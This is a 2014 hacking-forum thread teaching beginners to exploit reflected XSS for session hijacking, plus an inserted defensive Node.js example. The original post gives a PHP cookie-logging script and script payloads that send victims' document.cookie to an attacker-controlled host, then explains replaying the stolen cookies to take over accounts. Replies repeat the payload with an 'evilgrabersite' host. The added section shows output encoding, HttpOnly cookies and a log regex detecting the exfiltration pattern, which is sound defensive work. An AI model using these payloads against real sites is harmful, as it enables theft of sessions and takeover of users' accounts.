How to exploit an XSS after you've found for beginners

10-03-2014, 02:29 AM #1
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
Many of you know how to find an XSS but fail to exploit it.

An XSS is a vulnerability that allows the extraction of the cookies of users who visit the link containing the XSS. If the user is logged in, the cookie holds the session login information; this means that if we steal it and replace ours with it, we can access the victim's account without knowing her credentials.

Suppose we found an XSS vulnerability on a particular site. First we need a website or a server to which the cookie will be sent. Suppose it is http://www.sitegrab.com. Place on that server a file called grab.php that contains the following PHP code:

Code:
<?php
$cookie = $HTTP_GET_VARS["cgrab"];
$fh = fopen('cookies.txt', 'a');
fwrite($fh, $cookie . "\n\n");
?>

Sometimes some servers do not allow the creation of the cookies.txt file if it does not exist, so it is good to create a file called "cookies.txt" yourself and make sure it has read and write rights.

As you saw, the XSS proofs that are posted are in general like <script>alert('1')</script>. That just shows that the site is vulnerable to XSS. The script that you need to use is this:

Code:
<script>document.location="http://www.sitevulnerabil.com/grab.php?cgrab=" + document.cookie</script>

Send the XSS link to a particular user (who I assume is logged in) and the cookie will be saved in http://www.sitevulnerabil.com/cookies.txt.
You just have to take the cookies and add them to the cookies folder of Internet Explorer, or replace the current ones with them. This will log you into the victim's session and you have full rights on the account.
Source

[#] Twitter: sickspawnhy
[#] Jabber : [email protected]

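For the defender's side of what this thread describes, here is an added example (not from the post or from the forum) in plain Node.js: it hardens a page like browse.php?id=... against the cookie-theft payload above by HTML-encoding the reflected parameter and issuing the session cookie with HttpOnly, so document.cookie cannot read it, and it flags access-log lines that carry the exfiltration pattern. The log lines are constructed samples; the hostnames are the thread's own examples.

```javascript
// Added example: server-side defences against the reflected-XSS cookie
// theft described in this thread. Plain Node.js, no third-party modules.

// 1. Output encoding: the reflected "id" parameter is HTML-escaped before
//    it is written into the page, so <script>...</script> renders as text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Renders the body of the (formerly vulnerable) browse page safely.
function renderBrowsePage(id) {
  return `<p>Browsing item: ${escapeHtml(id)}</p>`;
}

// 2. Session cookie flags: HttpOnly hides the cookie from document.cookie
//    (the payload in this thread then exfiltrates nothing), Secure keeps it
//    off plain HTTP, SameSite=Lax limits cross-site sending.
function sessionCookieHeader(sessionId) {
  if (!/^[A-Za-z0-9]+$/.test(sessionId)) throw new Error('bad session id');
  return `PHPSESSID=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// 3. Detection: flag request lines whose query string carries the
//    "document.cookie" exfiltration pattern, raw or with the dot URL-encoded.
const EXFIL_RE = /document(\.|%2e)cookie/i;
function findCookieExfilAttempts(logLines) {
  return logLines.filter((line) => EXFIL_RE.test(line));
}

// Constructed sample access-log lines; the second one carries the thread's
// payload as a browser would send it (URL-encoded).
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Oct/2014:02:29:00] "GET /page/browse.php?id=12 HTTP/1.1" 200',
  '10.0.0.9 - - [10/Oct/2014:02:30:11] "GET /page/browse.php?id=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.sitegrab.com%2Fgrab.php%3Fcgrab%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200',
  '10.0.0.7 - - [10/Oct/2014:02:31:40] "GET /page/browse.php?id=13 HTTP/1.1" 200',
];

// Demonstration of all three pieces on the thread's own payload.
function demo() {
  return {
    page: renderBrowsePage('<script>alert(1)</script>'),
    cookie: sessionCookieHeader('abc123'),
    hits: findCookieExfilAttempts(SAMPLE_LOG),
  };
}
```

The same regex can be pointed at a real access log by reading it line by line; anything it flags deserves a look at which id value was reflected and whether the session cookie was HttpOnly at the time.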
10-03-2014, 08:20 PM #2
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Great share, but I think it is a bit too easy to identify. You can use some image inclusion, like in one of my tutorials here.


10-16-2014, 02:58 PM #3
Ninja Offline Junior Member **
Registered
Posts:29 Threads:2 Joined:Oct 2014 Reputation: 4
Mood: Speechless
If my memory serves me right, then what you say will not work.

Correct me if I am wrong.

You said to use "http://www.sitevulnerabil.com/grab.php?..grab code"

But suppose the XSS is in "http://www.sitevulnerabil.com/page/browse.php"; then we can't get the cookie.

So to grab the cookie we have to form the URL like this??:-
"http://www.sitevulnerabil.com/page/grab.php?..grab code"
confused

It's not always necessary that the index page will be XSS vulnerable.

Suppose http://www.sitevulnerabil.com/page/browse.php?id=12 is vulnerable; then how do we grab the cookie?

# Knowledge Must Be free
# Anyone needs any C++/ASM programming help then contact me.
# Need help compiling your local roots,i will do that too.
http://www.madleets.com

10-16-2014, 06:39 PM #4
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
Ninja, the XSS may be in /grab.php, browse.php, search.php etc.
(it's just an example)
I do not understand... what do you mean exactly?

[#] Twitter: sickspawnhy
[#] Jabber : [email protected]

10-17-2014, 01:14 AM #5
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Yep, I am totally confused too.
I found the explanation from sickspawn totally understandable.


10-17-2014, 01:50 AM #6
Ninja Offline Junior Member **
Registered
Posts:29 Threads:2 Joined:Oct 2014 Reputation: 4
Mood: Speechless
Haaa, ok ok.

Suppose this link has XSS:- http://www.google.com/form/submit.php?id=1 (XSS flaw after php?id=1)

So to grab the cookie of google.com I must use:-
<script>document.location="http://www.google.com/grab.php?cgrab=" + document.cookie</script>

OR

<script>document.location="http://www.google.com/form/submit.php?grab.php?cgrab=" + document.cookie</script>

??

# Knowledge Must Be free
# Anyone needs any C++/ASM programming help then contact me.
# Need help compiling your local roots,i will do that too.
http://www.madleets.com

10-17-2014, 01:52 AM #7
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Nope, you need a default XSS injection code like this:
Code:
<script>document.location="http://evilgrabersite/grab.php?content=" + document.cookie;</script>
